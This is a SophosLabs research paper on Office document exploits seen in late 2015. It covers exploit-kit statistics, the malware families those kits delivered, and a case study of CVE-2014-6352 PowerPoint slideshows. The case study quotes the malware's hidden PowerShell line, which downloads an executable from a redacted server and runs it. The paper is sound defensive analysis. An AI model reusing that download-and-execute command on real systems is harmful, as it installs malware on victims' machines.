2015 q4 exploit stats technical paper

2015 Q4 document exploits of 12

2015 Q4 exploit stats In our research we examined the attack reports related to Microsoft Office documents to figure out which exploits are the most common and what malware they are most actively distributing.

CVE-‐2012-‐0158 has been topping our document exploit charts for many years. It seems that nothing endangers the reign of this dinosaur, even though challengers have appeared over recent years.

Gabor Szappanos, Principal Malware Researcher, SophosLabs


Contents

Exploit stats ............................................................................................................................................... 3

Exploit kits in action .................................................................................................................................. 4

MWI ......................................................................................................................................................... 5

AK-2 ........................................................................................................................................................ 6

DL-1 ........................................................................................................................................................ 7

DL-2 ........................................................................................................................................................ 7

The case of CVE-2014-6352 ............................................................................................................... 7

Distributed malware ................................................................................................................................ 11

Conclusion ............................................................................................................................................... 12


Exploit stats Ever since we first started extensively tracking exploits, one has dominated proceedings: CVE-‐2012-‐0158. But August 2015 saw a new Office exploit (CVE-‐2015-‐1641) start its climb up the charts.

In recent months malware authors have been extensively interested in document exploits, using them as primary infection vectors. In typical infection scenarios, exploited documents were attached to phishing email messages and sent out to large numbers of random recipients (in the case of cybercrime groups) or a smaller number of selected targets (in the case of APT groups).

Even though older exploits are still working against a large percentage of the user population, this new exploit has more value, as fewer users are expected to be patched against newer exploits.

CVE-‐2012-‐0158 has been around for well over three years now, so it is no wonder that the malware authors were looking for a replacement. Over the years there were a few candidates, like CVE-‐2013-‐3906 or CVE-‐2014-‐07611, but none of them has really threatened its position as the most prominent document exploit.

The chart breaks down the reported incidents from the last quarter of 2015 into the document exploits used. In many cases the exploited documents contained multiple exploits -‐ then the incident accounted for all of the exploits in use.

After all these years CVE-‐2012-‐0158 is still leading, but it is not an absolute majority. Clearly, the malware authors have increased interest in using newer exploits.

But interest is not enough for a change. The shift is not the result of the creativity of the malware authors – they didn’t start to do their own implementation of the exploit. Rather, they have been using exploit generators extensively throughout the past two years. The effect of these kits will be discussed in the next section.

1 https://nakedsecurity.sophos.com/2015/02/03/exploit-‐this-‐evaluating-‐the-‐exploit-‐skills-‐of-‐malware-‐groups/

CVE-‐2012-‐0158

48% CVE-‐2014-‐635

2 15%

CVE-‐2015-‐1641

12%

CVE-‐2013-‐3906

12%

CVE-‐2014-‐1761

11%

CVE-‐2014-‐4114 2%

https://nakedsecurity.sophos.com/2015/02/03/exploit-this-evaluating-the-exploit-skills-of-malware-groups/


In fact, the only reason for the exploits CVE-‐2013-‐3906 and CVE-‐2014-‐1761 being present on our chart is that Microsoft Word Intruder generates documents with multiple exploits. MWI generated documents place these two exploits at the top of the list. Other than MWI these two exploits are unused.

Exploit kits in action In our research we took a closer look at the reported exploit samples, and determined where they originated from. During this we found that they could be put into only a handful of groups. Documents in each group were very similar to each other, and we suspect that they were produced by the same exploit generator. Some of these exploit kits are confirmed to be commercial products, others we only suspect to be commercial.

The common characteristics (including the delivered exploits) are summarized in this table, redacted from our paper2:

MWI AK-‐2 DL-‐1 DL-‐2

Downloader ü û ü ü

Dropper ü ü û û

Decoy û ü û û

Payload Execution WMI WinExec ShellExecuteA WinExec

Multiple exploits ü û û û

CVE-‐2010-‐3333 ü û û û

CVE-‐2012-‐0158 ü û ü ü

CVE-‐2013-‐3906 ü û û û

CVE-‐2014-‐1761 ü û û û

CVE-‐2015-‐1641 ü ü û û

2 https://blogs.sophos.com/2016/04/20/sophoslabs-‐investigates-‐the-‐most-‐popular-‐microsoft-‐office-‐exploit-‐kits/

https://blogs.sophos.com/2016/04/20/sophoslabs-investigates-the-most-popular-microsoft-office-exploit-kits/


The breakdown of the incidents by the originating exploit kit looks like this:

The largest group of our user reports came from downloaders created by the DL-‐1 generator, due to the aggressive distribution campaigns.

The second largest group of the reports belonged to the CVE-‐2014-‐6352 PowerPoint vulnerability, details of which will follow later in this paper.

Overall, 75% of the overall attacks came from documents generated by one of the four major exploit generators: DL-‐1, AK-‐2, MWI and DL-‐2.

The utilization of these exploit kits was quite uniform. Not only were the number of user incidents around the same level but also the number of samples created by these kits were evenly distributed; between 15 and 25 for the four kits – one of them is dominant over the others.

MWI

We covered Microsoft Word Intruder thoroughly in a previous research paper3.

MWI distribution campaigns are limited in target number by design. The distributed malware varied very widely, from common botnet Trojans like Zbot, Neurevt and Nanocore, to password stealers like KeyBase or HawkEye and remote administration tools like TeamViewer. We even observed MWI distributing TeslaCrypt ransomware.

3 https://nakedsecurity.sophos.com/2015/09/02/microsoft-‐word-‐intruder-‐revealed-‐inside-‐a-‐malware-‐construction-‐kit/

DL-‐1 36%

CVE-‐2014-‐6352 20%

AK-‐2 16%

MWI 14%

DL-‐2 10%

Other 4%

https://nakedsecurity.sophos.com/2015/09/02/microsoft-word-intruder-revealed-inside-a-malware-construction-kit/


The incidents related to MWI in the same quarter showed a steady low volume, with two large peaks:

The largest peak around 14 November 2015 was a massive Teslacrypt ransomware distribution wave, and the one at 8 December 2015 was a Nanocore backdoor distribution wave. Other than that, we have seen a steady low flux of incidents, which is an intentional behaviour of the MWI using groups.

AK-‐2

AK-‐2 is a relatively new development. It was first reported in our blog4 and analysed in detail in our research paper5.

The delivered payload in AK-‐2 powered distribution campaigns were more one-‐sided, limited to the common malware families like Zbot, Fareit/Pony, Neurevt or NetWiredRC. The only deviation from this pattern was one campaign distributing the KeyBase logger.

The first large peak around 17 October 2015 was a result of a few massive consecutive Zbot distribution waves. The largest peak around 5 November 2015 was a result of Fareit/Pony distribution. The main activity around this exploit generator focused in the month between the middle of October and November, after which we saw a lower intensity of attacks.

4https://nakedsecurity.sophos.com/2015/09/08/anatomy-‐of-‐a-‐malicious-‐email-‐recent-‐word-‐hole/

5https://blogs.sophos.com/2016/04/20/sophoslabs-‐investigates-‐the-‐most-‐popular-‐microsoft-‐office-‐exploit-‐kits/

0

100

200

300

400

0 100 200 300 400 500 600 700 800 900

1000


https://nakedsecurity.sophos.com/2015/09/08/anatomy-of-a-malicious-email-recent-word-hole/


DL-‐1

DL-‐1 was first reported and analysed in detail in our research paper6.

The distributed malware was also limited to the traditional malware families like Chisburg, Zbot, Fareit/Pony, Neurevt and Andromeda.

DL-‐2

DL-‐2 was first reported and analysed in detail in our research paper.

The distributed malware was also limited to the traditional malware families like Zbot, Neurevt and Andromeda.

The following chart is the combined incident count for DL-‐1 and DL-‐2, as we believe these are very closely related and are used by the same groups:

The massive peak at 24 October 2015 was the result of an intensive Zbot distribution wave.

The case of CVE-‐2014-‐6352

The samples using this exploit were a special case in the examined quarter; they deserve a section on their own.

We have no reason to believe that these samples were generated by a kit; it is much more likely to have been manually created. There were a lot fewer (a few dozen) malicious presentations belonging to this group, and additionally they used the proprietary PowerPoint binary file format, with the content of the file (including the embedded executable) stored within a compressed OLE2 stream. Not impossible to do it programmatically, but quite complicated.

The malware is distributed as a PowerPoint slideshow. A slideshow is not different from a regular PowerPoint, it is only renamed to a different file extension: from the usual .PPT to .PPS. The interesting part about slideshows is that the show automatically starts when it is opened.

6 https://blogs.sophos.com/2016/04/20/sophoslabs-‐investigates-‐the-‐most-‐popular-‐microsoft-‐office-‐exploit-‐kits/

0

100

200

300

400

500

600



That will automatically trigger the CVE-‐2014-‐6352 vulnerability. The user may be prompted to allow the running of an executable:

Looking at a malicious slideshow at first does not reveal nastiness:

However, if we zoom closer, it becomes obvious that there is an embedded object in the presentation:


This is an embedded packager object. This object can be created if one drags an executable from Desktop into a PowerPoint presentation:

In this case the packager object is crafted so that the display name would be that of the innocent PUTTY utility.

This is done by assigning a custom animation to this object, whenever the slideshow is displayed. This is very much the same as described in the PhisMe blog7, even though in their case the criminals used the newer PPTX format, and the embedded object is a VBScript file.

7 http://phishme.com/powerpoint-‐and-‐custom-‐actions/

http://phishme.com/powerpoint-and-custom-actions/


But the actual content is a malicious executable. It is actually a DOS batch program converted into an executable using a freeware batch-‐to-‐exe converter8.

The original batch content is a very simple downloader code, which invokes the PowerShell interpreter to use the Windows Management Instrumentation extension in the contemporary Windows operating systems:

cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://****************/jpgopy.exe','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;

8 http://www.f2ko.de/en/b2e.php

http://f2ko.de/en/b2e.php


The exact payload was not available in most of the cases. But in the few identifiable cases the KeyBase keylogger and password stealer was distributed, which is a trending new threat9.

Only a handful of download servers were used in the CVE-‐2014-‐6352 related distributions. This indicates that the activity related to this exploit was limited to only a few, very active, groups. It is even possible that it is a single group producing such a high volume that nearly tops the exploit charts.

This is strengthened by the fact that the author and last saved by user name are the same in all documents (in the campaigns in our statistics): zeus and Crypteros.

Using packager object for malware distribution is far from being novel. It’s been known and used for over 15 years. Back then the Stages worm10 used shell scrap objects11 in a very similar way.

Distributed malware In the context of this research we took a deep dive, and for each reported document exploit sample we attempted to determine the delivered payload – in the majority of the cases successfully.

However for the downloader samples, the downloaded file was not available for many of the cases and there the payload was not possible to determine. In particular, we don’t know the payload of the two most prevalent campaigns, although based on the distribution pattern related to the other activities of the same exploit kit; the most prevalent campaign most likely distributed one of FareIt/Neurevt/Zbot/Chisburg, while the second most prevalent campaign we suspect distributed

9 https://blog.team-‐cymru.org/2016/02/keybase-‐malware-‐family-‐added-‐to-‐team-‐cymru-‐botnet-‐analysis-‐and-‐reporting-‐service-‐bars/ 10 https://www.sophos.com/en-‐us/press-‐office/press-‐releases/2000/06/va_stages.aspx 11 https://www.giac.org/paper/gsec/614/wrapping-‐malicious-‐code-‐windows-‐shell-‐scrap-‐objects/101444

https://blog.team-cymru.org/2016/02/keybase-malware-family-added-to-team-cymru-botnet-analysis-and-reporting-service-bars/

https://www.sophos.com/en-us/press-office/press-releases/2000/06/va_stages.aspx

https://www.giac.org/paper/gsec/614/wrapping-malicious-code-windows-shell-scrap-objects/101444


KeyBase. Consequently, these families are most likely underrepresented in our stats (even though they are at the top of the chart), due to the lack of information.

The following chart contains only the confirmed delivered payloads.

The most actively distributed malware was HawkEye. A typical supply chain hijack attack scenario of this keylogger was described in our blog12 earlier.

The second largest group are the closely linked Zbot/Fareit/Neurevt distributions. Other than that, the usual Trojans (Andromesa, Chisburg, Wauchos), remote admin Trojans (NetWiredRC, NanoCore) and application (TeamViewer) were delivered with the help of Office exploit generators.

Conclusion The cybercrime groups find Office documents a convenient way to deliver malicious program to their targets. They have been using this method steadily over the past two years and there is no sign that they intend to give up on this method. But their approach is evolving over the time: they use several black market tools to generate the exploited documents, and thanks to the development of these tools they get to use newer Office exploits.

However, they don’t get to use zero days. Even the freshest exploit in their arsenal was fixed 6 months before the widespread usage started.

It shouldn’t be difficult to protect against the activities of this group: just applying the patches for Microsoft Office could disarm the attack.

12 https://nakedsecurity.sophos.com/2016/02/29/the-‐hawkeye-‐attack-‐how-‐cybercrooks-‐target-‐small-‐businesses-‐for-‐big-‐money/

Hawkeye 18%

Zbot 15%

Fareit 15% Neurevt

14%

Chisburg 7%

NetWiredRC 7%

Teslacrypt 5%

Wauchos 5%

Andromeda 4%

KeyBase 4% Toga

2%

Skeeyah 2% NanoCore

1%

TeamViewer 1%

Msil 1% Dofoil

1%

https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/